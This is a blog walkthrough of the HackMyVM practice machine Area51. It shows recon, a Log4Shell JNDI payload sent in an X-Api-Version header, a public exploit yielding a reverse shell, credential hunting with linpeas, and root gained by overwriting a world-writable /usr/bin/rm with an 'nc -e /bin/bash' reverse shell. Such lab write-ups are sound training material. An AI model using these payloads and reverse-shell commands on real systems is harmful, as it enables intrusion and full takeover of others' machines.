Area51 Log4Shell exploit hackmyvm writeup walkthrough security

Area51 – Writeup – Log4Shell – HackMyVM

Area51 is an easy machine built on the recent 0-day vulnerability of the Log4j utility. This is one of the vulnerabilities that had a lot of impacts worldwide and affected many enterprises. I also like to extend a huge thanks to the author bitc0de for this. The machine is fairly simple once we get the foothold. So, let’s start the writeup. “Area51 – Writeup – Log4Shell – HackMyVM”

Link to the machine:

Step 1: Get the IP address

As usual, I began enumeration by identifying the IP address of the target machine.

└─$ fping -aqg

Here, the IP address of my Kali machine is and that of the target is (The IP has reset from the beginning because I recently switched to my Fedora 35 and created a new NAT network on VirtualBox. Please, leave a comment if you are a fan of Fedora)

Step 2: Scan ports using nmap

Next, I checked the open ports on the target that we can access from the network.

└─$ nmap -T4 -sC -sV -p- -oN nmap.log
Starting Nmap 7.92 ( ) at 2022-01-01 19:28 +0545
Nmap scan report for
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (conn-refused)
22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
|   256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_  256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp   open  http        Apache httpd 2.4.51 ((Debian))
|_http-title: FBI Access
|_http-server-header: Apache/2.4.51 (Debian)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As we can see above, there are two HTTP ports. The one on 80 is Apache whereas that of 8080 is Spring Application. We can identify this from the text “Whitelabel error page”.

Step 3: Directory busting using gobuster

The website is pretty static. Thus, I perform directory busting on port 80.

└─$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u -x php,html,txt -o medium.log
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
2022/01/01 19:30:25 Starting gobuster in directory enumeration mode
/video                (Status: 301) [Size: 304] [-->]
/index.html           (Status: 200) [Size: 1131]                            
/radar                (Status: 301) [Size: 304] [-->]
/note.txt             (Status: 200) [Size: 119]                             
/moon                 (Status: 301) [Size: 303] [-->]

We have a note.txt that gives the information about the log4j exploit.

└─$ curl                                                   
We have a vulnerability in our java application...
Notify the programming department to check Log4J.


Step 4: Check Java Application on port 8080

Firstly, I was testing only on the “User-Agent” header for the exploit. However, it actually existed on the header “X-Api-Version”. I got this information from the website There are other tools that help us test for the exploit such as

Anyways, I also tested it on my own machine too. For this, I listened on port 9001.

└─$ nc -nlvp 9001                             
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on

Then, I sent the payload as follows.

└─$ curl -H 'X-Api-Version: ${jndi:ldap://}'

I got a connection.

└─$ nc -nlvp 9001                             
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from

This means that the application is really vulnerable to the Log4j exploit. For the exploit part, I tried to use JNDI Exploit Kit and ysoserialize modified. However, I wasn’t successful. If you guys were able to get the shell, please leave how you did in the comment.

Nevertheless, another original exploit POC worked.

└─$ git clone

We have to follow the README properly. It says that we have to download a particular JDK version. The repo owner has pasted the link on the README file. I copied the JDK on the directory of the exploit.

└─$ python3 --userip

[!] CVE: CVE-2021-44228
[!] Github repo:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://}
[+] Starting Webserver on port 8000

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on

Here, we can see that an LDAP service is open on port 1389.

└─$ curl '' -H 'X-Api-Version: ${jndi:ldap://}'

This gives us a reverse shell which is a docker container. Furthermore, it is an alpine image. So, we don’t have enough binaries to get us the proper shell.

Step 5: Get the password for the user roger

With the reverse shell, I carefully used to identify a file that has the password.

On the local machine, I would use netcat to push the file.

└─$ nc -nlvp 9001 < ~/
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on

Then, I used netcat on the target to put the file in the /tmp directory.

nc 9001 > /tmp/
cd /tmp
chmod +x
./ | tee linpeas.out | more

In the output, I saw the file that has the password.

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r--    1 root     root            10 Dec 19 19:19 /var/tmp/.roger

Step 6: Get the password of kang

I logged in to the user roger using SSH.

└─$ ssh roger@
roger@'s password: 
Linux area51 5.10.0-10-amd64 #1 SMP Debian 5.10.84-1 (2021-12-08) x86_64

Last login: Tue Dec 21 08:03:09 2021 from
Your input:
^Croger@area51:~$ ls
shoppingList  SubjectDescription  user.txt
roger@area51:~$ id
uid=1001(roger) gid=1001(roger) groups=1001(roger)

To remove the “Your input:” prompt, I simply used the Ctrl+C keystroke combination. Then, I transferred and pspy64 using a Python webserver. I won’t be explaining this step. The also gave me a file that contained the password for the user kang.

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)

In addition to this information, we can also see that the binary “/usr/bin/rm” is writable by everyone.



This piece of information is important once we switch to the user kang.

Step 7: Get the root shell

After I got the shell of kang, I checked the processes using pspy64.

2022/01/01 09:18:17 CMD: UID=0    PID=21123  | sh /kang/ 
2022/01/01 09:18:17 CMD: UID=0    PID=21124  | sleep 1 
2022/01/01 09:18:18 CMD: UID=0    PID=21126  | sleep 2 
2022/01/01 09:18:20 CMD: UID=0    PID=21128  | sleep 1 
2022/01/01 09:18:21 CMD: UID=0    PID=21130  | sleep 2 
2022/01/01 09:18:23 CMD: UID=0    PID=21132  | sleep 1 
2022/01/01 09:18:24 CMD: UID=0    PID=21134  | sleep 2 
2022/01/01 09:18:26 CMD: UID=0    PID=21136  | sleep 1

Here, some “sleep” commands are issued after the “” script on the home directory of kang is run. So, when I checked the home directory, I found that the file is created and removed regularly.

kang@area51:~$ ls -al
total 12
drwxrwx---  3 kang kang 4096 Jan  1 09:19 .
drwxr-xr-x 19 root root 4096 Dec 19 15:49 ..
lrwxrwxrwx  1 root root    9 Dec 19 18:16 .bash_history -> /dev/null
drwxr-xr-x  3 kang kang 4096 Dec 21 07:43 .local

Thus, I got a feeling that we can rewrite the binary “rm” to get our own shell as it is writable by everyone. For this, I will once again spawn a reverse shell on port 9001. So, as you guessed, I am already listening on port 9001.

kang@area51:~$ echo 'nc -e /bin/bash 9001' > /usr/bin/rm

After some time, I got the shell.

└─$ nc -nlvp 9001                
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@area51:/# echo

If you want to upgrade the shell, check the following guide.

Upgrade to an intelligent reverse shell

Also read: Warez Walkthrough – HackMyVM – Writeup

5 3 votes
Article Rating
Notify of
Newest Most Voted
Inline Feedbacks
View all comments